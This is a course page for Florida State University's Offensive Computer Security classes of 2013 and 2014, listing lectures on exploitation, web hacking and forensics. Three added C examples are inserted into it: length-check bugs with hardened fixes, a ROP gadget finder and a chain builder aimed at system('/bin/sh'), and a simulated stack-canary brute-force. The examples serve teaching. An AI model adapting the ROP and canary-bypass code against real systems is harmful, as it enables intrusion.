Never Ending Security


Florida State University’s Offensive Computer Security Spring 2013 – CIS4930 & CIS5930


Instructors

Prof. Xiuwen Liu (homepage: http://www.cs.fsu.edu/~liux/)
W. Owen Redwood (homepage: http://ww2.cs.fsu.edu/~redwood/)

Rationale:

The primary incentive for an attacker to exploit a vulnerability, or a series of vulnerabilities, is to achieve a return on an investment (usually his/her time). This return need not be strictly monetary: an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing, secure system administration, and incident response.

Spring 2013 Lectures & Videos

This page contains all the lecture slides and YouTube videos for the Spring 2013 semester of this course.


HD Video Download:

You can download and watch each lecture for this class at the following URL.
Simply streaming them from Dropbox will not work: Dropbox cuts the stream off about a quarter of the way through the video.

Video download URL
Lecture Video Torrent

The videos are much higher quality than their YouTube versions.


Course Lecture Videos / Slides / Reading:

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on YouTube are lower quality than the ones available for direct download (see above).

Week 1 (Intro / Overview):

Lecture 1: Intro, Ethics, & Overview:

[No video was recorded for this lecture due to technical difficulties]

This lecture covers the course intro, syllabus review, the distinction between hacking and penetration testing, an ethics discussion, course motivation, threat models, and some of the basics.

Resources:

Lecture 2: Linux Overview:

This lecture covers the basics of an OS: kernel vs. user space, system calls, Unix permissions, real vs. effective UID (ruid vs. euid), the ext file system (for the limited focus of forensics), persistence mechanisms used by malware, /var/log, and more.

Resources:


Week 2 (Overview / Code Auditing):

Lecture 3: Windows Overview

This lecture provides an overview of the registry and registry hives, persistence mechanisms used by malware, the Portable Executable (PE) file format, Windows system calls commonly used by malware, and the Windows API.

Resources:

Lecture 4: Rootkits; Code Auditing

The first half of this lecture covers rootkits and rootkit techniques for Windows and Linux. The second half covers code auditing concepts: design flaws, software analysis, vulnerability identification, signedness bugs and integer over/underflows, incorrect use of length parameters (strncpy, strncat, snprintf), format strings, and more.

Resources:

  • [Lecture Slides]
  • Required reading:
    Chapter 0x200 up to 0x250 in HAOE (Hacking: The Art of Exploitation).
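The length-parameter and signedness mistakes listed for the code-auditing half of this lecture, as an added C example that is not part of the course material: each vulnerable check sits beside its hardened form, and the functions return values instead of actually overflowing, so the bad arithmetic can be observed safely. MAX_PAYLOAD, the function names and the sample strings are constructed for this example.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define MAX_PAYLOAD 64   /* constructed limit for the example */

/* 1. Signedness bug: `len` arrives from the wire as a signed int and is only
 * checked against an upper bound. -1 passes the check and becomes SIZE_MAX
 * once memcpy/strncpy receives it. Returns 1 if the check accepts `len`. */
int vulnerable_length_ok(int len) {
    return len <= MAX_PAYLOAD;              /* -1 <= 64 is true */
}

int hardened_length_ok(int len) {
    return len >= 0 && len <= MAX_PAYLOAD;  /* reject negatives explicitly */
}

/* What memcpy(dst, src, len) actually sees after the implicit conversion. */
size_t as_memcpy_length(int len) {
    return (size_t)len;                     /* -1 -> SIZE_MAX */
}

/* 2. strncat's third argument is the room left in dst, not sizeof(dst).
 * Passing sizeof(dst) overflows by up to strlen(dst) bytes. This returns the
 * bound a correct call must use (0 when nothing more fits). */
size_t strncat_bound(const char *dst, size_t dst_size) {
    size_t used = 0;
    while (used < dst_size && dst[used] != '\0') used++;
    return used >= dst_size ? 0 : dst_size - used - 1;
}

/* 3. snprintf returns the number of bytes it *wanted* to write. Code that
 * accumulates that value into an offset walks past the buffer once a message
 * is truncated: the next call's `size - off` wraps around as size_t. Only the
 * arithmetic is reproduced here; the one write is properly bounded. */
size_t vulnerable_next_size(const char *first, size_t size) {
    char buf[MAX_PAYLOAD];
    size_t off = 0;
    if (size > sizeof buf) size = sizeof buf;
    off += (size_t)snprintf(buf, size, "%s", first);  /* returns strlen(first) */
    return size - off;                      /* underflows when off > size */
}

/* Hardened append: check every return value and stop on truncation. */
size_t hardened_append(char *buf, size_t size, const char *a, const char *b) {
    const char *parts[2] = { a, b };
    size_t off = 0;
    for (int i = 0; i < 2; i++) {
        int n = snprintf(buf + off, size - off, "%s", parts[i]);
        if (n < 0) return off;                        /* encoding error */
        if ((size_t)n >= size - off) return size - 1; /* truncated: stop */
        off += (size_t)n;
    }
    return off;
}

/* Exercises hardened_append on an 8-byte buffer; 1 if it truncated cleanly. */
int hardened_append_demo(void) {
    char buf[8];
    size_t n = hardened_append(buf, sizeof buf, "hello", "world");
    return n == 7 && strcmp(buf, "hellowo") == 0;
}

int main(void) {
    printf("vulnerable check accepts -1: %d\n", vulnerable_length_ok(-1));
    printf("hardened check accepts -1:   %d\n", hardened_length_ok(-1));
    printf("memcpy would see length:     %zu\n", as_memcpy_length(-1));
    printf("strncat bound for \"abc\"/8:   %zu\n", strncat_bound("abc", 8));
    printf("next snprintf size after truncation: %zu\n",
           vulnerable_next_size("0123456789abcdef0123", 16));
    printf("hardened append demo ok:     %d\n", hardened_append_demo());
    return 0;
}
```

The three functions share one root cause worth auditing for: a length that is computed in one type (signed int, total buffer size, "wanted" length) and consumed in another (size_t, remaining space, "written" length). When reviewing C, find every size argument to a copy or format call and trace where it was computed.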

Week 3 (Reverse Engineering Workshop Week):

Lecture 5: x86 Reverse engineering

This lecture is day one of our weeklong x86 reverse engineering workshop led by guest lecturer Mitch Adair.

Resources:

Lecture 6:

This lecture is day two of our weeklong x86 reverse engineering workshop led by guest lecturer Mitch Adair.

Resources:


Week 4 (Exploit Development)

Lecture 7: Fuzzing and Exploit Development 101

This lecture covers a fuzzing overview, the basics of exploit development, environment variables, stack attacks, buffer overflows, NOP sleds, etc.

Resources:

Lecture 8: Shellcode and Exploit Development 102

Lecture topics: more on writing shellcode (Linux vs. Windows), the win32 process memory map, and more.

Resources:


Week 5 (Exploit Dev / Networking)

Lecture 9: Exploit Development 103: SEH Exploitation, Heap Sprays, and Executable Security Mechanisms

This lecture covers SEH exploitation, heap sprays, and executable security mechanisms such as ASLR, DEP/NX, and stack cookies.

Resources:

Lecture 10: Networking 101: Data Layer, Link Layer, and IP layer

[No video was recorded for this lecture due to technical difficulties]

This lecture gives an overview of networking and network security concepts. Topics covered: Wireshark, Nmap, nc, hubs vs. switches vs. routers, manufacturer default logins and backdoors, ARP and DNS (DNSSEC), proxies, and the weak vs. strong host model (RFC 1122).

Resources:


Week 6 (Networking / Web Application Hacking)

Lecture 11: Networking 102: TCP layer, Important Protocols, Services, Portscanning, ARP

[No video was recorded for this lecture due to technical difficulties]

This lecture finishes up the networking overview from last time.

Resources:

Lecture 12: Web application Hacking 101

It's a bit shorter than other videos, as the class time was taken up going over homework beforehand. This lecture addresses some of the big picture with the topics covered so far, and moves into web application security topics.

Resources:


Week 7 (Web Application Hacking)

Lecture 13: Web Application Hacking 102: Big picture of topics so far, SQLi, XSS

This lecture's topics cover HTTP proxies, SQLi, and XSS.

Resources:

Lecture 14: Web Application Hacking 103: SSL attacks, advanced techniques

This lecture's topics cover SSL/TLS, Certificate Authorities, the serious problems with the Certificate Authority infrastructure, a history of CA hacks and breaches, and SSL hacking tools such as sslstrip.

Resources:


Week 8 (Web Application Hacking / Exploit dev)

Lecture 15: Web Application Hacking 104 & Exploit Development 104

This class was two lectures in one. In the web application 104 lecture we cover topics like WAFs and IDSes and how to evade them, which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode and encoders, and the methodology for defeating IDS/WAF.

Resources:

Lecture 16: Midterm review & Exploit Development 105 (ROP)

This lecture’s first half is a review of topics for the midterm. The second half introduces Return Oriented Programming.

Resources:


Week 9: (Special Topics)

Lecture 17: The Modern History of Cyber Warfare

This lecture covers just a small sample of the major events one might consider part of the history of cyber warfare. The lecture discusses some of the potential tactical and strategic differences between traditional warfare and cyber warfare – as well as the policy and perspective hurdles we face today. This lecture happened shortly after the ground-breaking APT1 report from Mandiant.

Resources:

Lecture 18: Social Engineering

The first portion of this video is a continuation of the previous lecture on cyber warfare. Afterwards, this lecture offers a new spin on social engineering, by starting with fundamental psychological flaws in the human brain and discussing how they can be exploited.

Resources:


Week 10 (Metasploit):

Lecture 19: Metasploit

This lecture covers the Metasploit framework, its interfaces, basic usage, and some of its utilities, along with a brief discussion of the Social-Engineer Toolkit (SET).

Resources:

MIDTERM

No video for this class…

The midterm was at this point, covering lectures 1-16.


Week 11 (Post Exploitation and Forensics):

Lecture 20: Meterpreter and Post Exploitation

This lecture starts by finishing the SET discussion from last time, covers Windows access tokens, then delves into Meterpreter and post exploitation.

Resources:

Lecture 21: Volatility and Incident Response:

This lecture gives an overview of incident response and delves into Volatility and memory analysis.

Resources:


Week 12 (Physical Security):

Midterm / Homework recap (no lecture)

No video for this class…

The lecture was sacrificed for administrative things like reviewing the midterm, homeworks, and term project expectations.

Resources:

Lecture 22: Physical Security Workshop: Lockpicking, USB mischief, and BACnet/SCADA system security

This class was an open workshop, thus there is no video for it…

This lecture covers physical security, with a hands-on workshop on lockpicking, along with a simultaneous discussion of USB-related mischief and building hacking (BACnet / SCADA).

Resources:


Week 13 (Malware / Student Presentations):

Lecture 23: Advanced Malware Techniques

No video for this class…

The lecture slides have been emailed out to the students, and will not be posted online.

Student Presentations Begin

No video for this class, nor the rest of the semester…

At this point, the course lectures have concluded. The remainder of the semester is taken up by student presentations on their term projects.


Week 14-15 (Student Presentations):

(No lectures)


More Information about this course can be found on:

Florida State University’s Offensive Computer Security Spring 2014 – CIS4930 & CIS5930


Instructors

Prof. Xiuwen Liu (homepage: http://www.cs.fsu.edu/~liux/)
W. Owen Redwood (homepage: http://ww2.cs.fsu.edu/~redwood/)

Rationale:

The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities is to achieve a return on an investment (his/her time usually). This return need not be strictly monetary—an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing, secure system administration, and incident response.

Course Lecture Videos / Slides / Reading:

Below you can find and watch all the course videos, required reading, and lecture slides for each lecture (where applicable). The videos hosted on YouTube are lower quality than the ones available for direct download.


Week 1 (Intro / Overview):

Lecture 1: Intro, Ethics, & Overview:

This lecture covers the course intro, syllabus review, the distinction between hacking and penetration testing, an ethics discussion, course motivation, threat models, and some of the basics.

Resources:

Lecture 2: Secure C Coding 101:

What you absolutely need to know about secure coding in C. C is everywhere.

Resources:


Week 2 (Secure C / Code Auditing):

Lecture 3: Secure C Coding 102:

What you absolutely need to know about secure coding in C. C is everywhere.

Resources:

Lecture 4: Code Auditing:

Auditing C code: basic tips, strategies, and exercises.

Resources:


Week 3 (Permissions Spectrum):

Holiday (No Class, Jan 20)

MLK Day Holiday

Lecture 5: The Permissions Spectrum:

Intro to Vulnerability Research topics and the Permissions spectrum.

Resources:


Week 4 (Reverse Engineering Week):

Lecture 6: Reverse Engineering Workshop 1

Guest lecturer Mitch Adair will lead a two day RE workshop, exposing students to x86 reverse engineering with IDA and CFF Explorer. Meet in the lecture room prepared (See email).
Resources:

Lecture 7: Reverse Engineering Workshop 2:

Guest lecturer Mitch Adair will lead a two day RE workshop, exposing students to x86 reverse engineering with IDA and CFF Explorer. Meet in the lecture room prepared (See email).


Week 5 (Fuzzing Week):

Lecture 8: Fuzzing Lecture 1

Coverage of fuzzing techniques for the SDL (security development lifecycle), vulnerability research (VR), and other applications.
[Slides]

Lecture 9: MIDTERM REVIEW:

[No class video, see slides!]

Week 6 (MIDTERM 1 and Exploit Development Week 1):

MIDTERM 1

[no video for this class]

Lecture 10: Fuzzing Lecture #2 and Exploitation Lecture 101:

PART 1:

PART 2:

There are two videos for this lecture. The first half is a wrap-up of fuzzing topics. The second half is the beginning of the exploit development lectures.

Resources:



Lecture 11: Exploit Development 102

Second lecture in the exploit development lecture series, covering the very basics of exploitation. The concept of ret2libc is covered, with examples using basic exit() shellcode and some basic position-independent shellcode.

Resources:

  • [Slides]
  • Reading:
    Read 0x500 up to 0x540 in HAOE (Writing shellcode)
    Read 0x6A0 up to 0x700 in HAOE

This class was cancelled (postponed to next week)


Week 7 (Exploit Development / Networking):

Lecture 12: Exploit Development 103

Third lecture in the exploit development lecture series. Coverage of heap and format string exploitation (with demos), as well as exploit mitigations (ASLR, NX/DEP, stack cookies, EMET, etc.).

Resources:

  • [Slides]
  • Reading:
    Read 0x680 up to 0x6A0 in HAOE

Lecture 13: Networking Lecture 101:

This lecture gives an overview of networking and network security concepts. Topics covered: Wireshark, Nmap, nc, hubs vs. switches vs. routers, manufacturer default logins and backdoors, ARP and DNS (DNSSEC), proxies, and the weak vs. strong host model (RFC 1122).

Resources:


Week 8 (Exploit Dev / Web Application Hacking/Security)

Lecture 14: Exploit Development 102

Resources:

  • [Slides]
  • Reading:
    Read 0x450 up to 0x500 in HAOE (27 pages)
    Read 0x540 up through 0x550 in HAOE (11 pages)
    Read Chapter 1 in WAHH (The Web Application Hacker's Handbook; 15 pages)

Lecture 15: Wireshark and Web Application Hacking/Security 101

[Video on Wireshark coming soon]

It's a bit shorter than other videos, as the class time is split between this lecture and a Wireshark/tcpflow demo. This lecture addresses some of the big picture with the topics covered so far, moves into web application security topics, and includes a very basic demo using Burp Suite as an HTTP proxy.

Resources:

Required Reading:

Related Reading:


Week 10 (Web Applications):

Lecture 16: Web Application Hacking/Security 102

Coverage of SQLi, XSS, metacharacter injection, the OWASP Top 10, and demos.

Resources:

Lecture 17: Web Application Hacking/Security 103


Week 11 (Web Applications and Exploitation):

Lecture 18: Web Application Hacking/Security 104 and Exploitation 104

This class was two lectures in one. In the web application 104 lecture we cover topics like WAFs and IDSes and how to evade them, which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode and encoders, and the methodology for defeating IDS/WAF.

Resources:

Lecture 19: Midterm review #2 and Exploitation 105

ROP Lecture:

This lecture covers ret2libc, return chaining, ROP, how calling conventions affect ROP, how ROP is used to defeat DEP, how ASLR affects ROP, how to defeat ASLR to enable ROP, stack pivoting, etc. This lecture is just the concepts; next time is the demos.
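The ROP concepts above (and the 2013 introduction to ROP in Lecture 16), as an added C example that is not code from the course: a byte-pattern gadget finder for the two-byte `pop rdi; ret` and `pop rsi; ret` gadgets plus a bare `ret`, and a chain builder that lays out a SysV x86-64 call to target(arg0) entirely as base + offset, which is what makes a single leaked pointer defeat ASLR for the whole chain. The sample code bytes, the base address and the target/string offsets are constructed placeholders, not real libc values.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* Constructed "code" to scan; only the gadget bytes matter.
 * x86-64 opcodes: 5f = pop rdi, 5e = pop rsi, c3 = ret. */
static const uint8_t SAMPLE_CODE[] = {
    0x48, 0x89, 0xe5,   /* mov rbp, rsp (filler)        */
    0x5f, 0xc3,         /* pop rdi; ret  -> offset 3     */
    0x90,               /* nop                           */
    0x5e, 0xc3,         /* pop rsi; ret  -> offset 6     */
    0xc3                /* ret (first bare ret is at 4)  */
};
#define SAMPLE_CODE_LEN (sizeof SAMPLE_CODE)

typedef struct { size_t pop_rdi, pop_rsi, ret; } gadgets_t;

/* Find the first pop rdi; ret, pop rsi; ret and bare ret. Offsets are
 * relative to the start of the blob, i.e. to the module's load base. */
int find_gadgets(const uint8_t *code, size_t len, gadgets_t *g) {
    int have_rdi = 0, have_rsi = 0, have_ret = 0;
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0xc3 && !have_ret) { g->ret = i; have_ret = 1; }
        if (i + 1 < len && code[i + 1] == 0xc3) {
            if (code[i] == 0x5f && !have_rdi) { g->pop_rdi = i; have_rdi = 1; }
            if (code[i] == 0x5e && !have_rsi) { g->pop_rsi = i; have_rsi = 1; }
        }
    }
    return have_rdi && have_rsi && have_ret;
}

/* Stack words are 8-byte little-endian values. */
static size_t put_qword(uint8_t *chain, size_t off, uint64_t v) {
    for (int i = 0; i < 8; i++) chain[off + i] = (uint8_t)(v >> (8 * i));
    return off + 8;
}

uint64_t get_qword(const uint8_t *chain, size_t off) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v |= (uint64_t)chain[off + i] << (8 * i);
    return v;
}

/* Lay out a SysV x86-64 chain equivalent to target(arg0). The first word
 * overwrites the saved return address; each `ret` pops the next word into
 * rip. `base` is the module's load address (leaked at runtime under ASLR).
 * align_pad prepends a bare `ret`, the usual fix when a chain into glibc's
 * system() crashes because rsp is not 16-byte aligned at the call.
 * Returns the chain length in bytes. */
size_t build_call_chain(uint8_t *chain, uint64_t base, const gadgets_t *g,
                        uint64_t target_off, uint64_t arg0, int align_pad) {
    size_t off = 0;
    if (align_pad) off = put_qword(chain, off, base + g->ret); /* rip <- ret */
    off = put_qword(chain, off, base + g->pop_rdi); /* rip <- pop rdi; ret  */
    off = put_qword(chain, off, arg0);              /* popped into rdi      */
    off = put_qword(chain, off, base + target_off); /* ret -> target(rdi)   */
    return off;
}

/* Builds the chain with placeholder addresses and checks its layout. */
int rop_demo(void) {
    gadgets_t g;
    uint8_t chain[64];
    const uint64_t base       = 0x7f1234560000ULL; /* assumed leaked base   */
    const uint64_t target_off = 0x1000;            /* placeholder system()  */
    const uint64_t binsh_off  = 0x2000;            /* placeholder "/bin/sh" */
    if (!find_gadgets(SAMPLE_CODE, SAMPLE_CODE_LEN, &g)) return 0;
    size_t n = build_call_chain(chain, base, &g, target_off, base + binsh_off, 1);
    return n == 32
        && get_qword(chain, 0)  == base + g.ret
        && get_qword(chain, 8)  == base + g.pop_rdi
        && get_qword(chain, 16) == base + binsh_off
        && get_qword(chain, 24) == base + target_off;
}

int main(void) {
    gadgets_t g;
    if (find_gadgets(SAMPLE_CODE, SAMPLE_CODE_LEN, &g))
        printf("pop rdi;ret @%zu  pop rsi;ret @%zu  ret @%zu\n",
               g.pop_rdi, g.pop_rsi, g.ret);
    printf("chain layout ok: %d\n", rop_demo());
    return 0;
}
```

On real binaries the same search is done over the executable segments (and with a disassembler, since any byte sequence ending in c3 that decodes usefully is a gadget); the argument order (rdi, rsi, rdx, ...) is why `pop rdi; ret` is the first gadget everyone hunts for on x86-64, while 32-bit x86 passes arguments on the stack and needs no register gadgets for a simple ret2libc.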

Resources:

Reading:


Week 12 (ROP and Metasploit):

Lecture 21: Guest Lecturer Devin Cook on ROP and a brief history of exploitation

Devin Cook presented a recap of all the exploitation techniques covered thus far, lectured on ROP, and presented demos of ROP exploitation. Lastly, defenses against ROP were discussed.

Resources:

Lecture 22: Metasploit

This lecture covers the Metasploit framework.

Resources:


Week 13 (MIDTERM #2 and Post Exploitation):

MIDTERM #2

[No video / lecture]

Lecture 23: Meterpreter and Post Exploitation

Post exploitation, Windows authentication and tokens, and pivoting techniques are covered. Demos of SET, Meterpreter, and more are shared.

Resources:


Week 14 (Forensics and Incident Response):

Lecture 24: Volatility and Forensics

Old video covering Volatility and performing forensic analysis on hacked machines.

Resources:

Lecture 25: Revisiting Old Topics

Wrapping up the course, revisiting old topics: stack cookies and going in depth on how they are bypassed, covering the SSL bugs, digitally signed malware, and then the big picture.

Resources:
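One of the stack-cookie bypasses this lecture refers to, as an added C example that is not code from the course: a forking network server copies the parent's stack, so every child carries the same canary, and an attacker who can distinguish a crash (`__stack_chk_fail` aborting the child) from a normal reply can recover the cookie one byte at a time, 256 tries per byte instead of 256^8 for the whole value. The secret canary and the oracle that stands in for the child process are constructed here.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define CANARY_LEN 8

/* Constructed secret for the simulated server. The leading 0x00 mirrors
 * glibc on x86-64, which zeroes the low byte so str* copies stop there. */
static const uint8_t SECRET_CANARY[CANARY_LEN] =
    { 0x00, 0x7f, 0x3a, 0x91, 0xc4, 0x5e, 0x10, 0xe2 };

typedef int (*oracle_fn)(const uint8_t *guess, size_t len);

/* Oracle: one forked child handles a request whose overflow clobbers the
 * first `len` canary bytes with `guess`. Because fork() duplicates the
 * parent's memory, each child has the same canary; a child that survives
 * tells the attacker the prefix was right. Returns 1 = survived, 0 = abort. */
int child_survives(const uint8_t *guess, size_t len) {
    return memcmp(guess, SECRET_CANARY, len) == 0;
}

/* Recover the canary byte by byte, keeping already-known bytes fixed.
 * Returns the number of requests sent, or 0 if some byte could not be
 * found (the oracle never reported survival for any of 256 values). */
size_t brute_force_canary(uint8_t *out, size_t n, oracle_fn oracle) {
    size_t requests = 0;
    for (size_t i = 0; i < n; i++) {
        int found = 0;
        for (int b = 0; b < 256; b++) {
            out[i] = (uint8_t)b;
            requests++;
            if (oracle(out, i + 1)) { found = 1; break; }
        }
        if (!found) return 0;
    }
    return requests;
}

/* Runs the attack against the simulated server; 1 if the cookie was
 * recovered in at most 256 * CANARY_LEN requests. */
int canary_demo(void) {
    uint8_t recovered[CANARY_LEN] = {0};
    size_t requests = brute_force_canary(recovered, CANARY_LEN, child_survives);
    return requests > 0 && requests <= 256 * CANARY_LEN
        && memcmp(recovered, SECRET_CANARY, CANARY_LEN) == 0;
}

int main(void) {
    uint8_t recovered[CANARY_LEN] = {0};
    size_t requests = brute_force_canary(recovered, CANARY_LEN, child_survives);
    printf("requests: %zu, canary:", requests);
    for (size_t i = 0; i < CANARY_LEN; i++) printf(" %02x", recovered[i]);
    printf("\n");
    return 0;
}
```

The same per-byte oracle recovers the saved frame pointer and return address that sit above the canary, which is how ASLR is leaked from a forking server in the same session. The defence is to stop reusing the secret across children: re-exec instead of fork, or re-randomise the canary per child, so that every crash costs the attacker all progress.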


Week 15 (Last Week: Physical Security and Social Engineering):

Lecture 26: Social Engineering


More information about this course can be found on:

Offensive Computer Security Video Lectures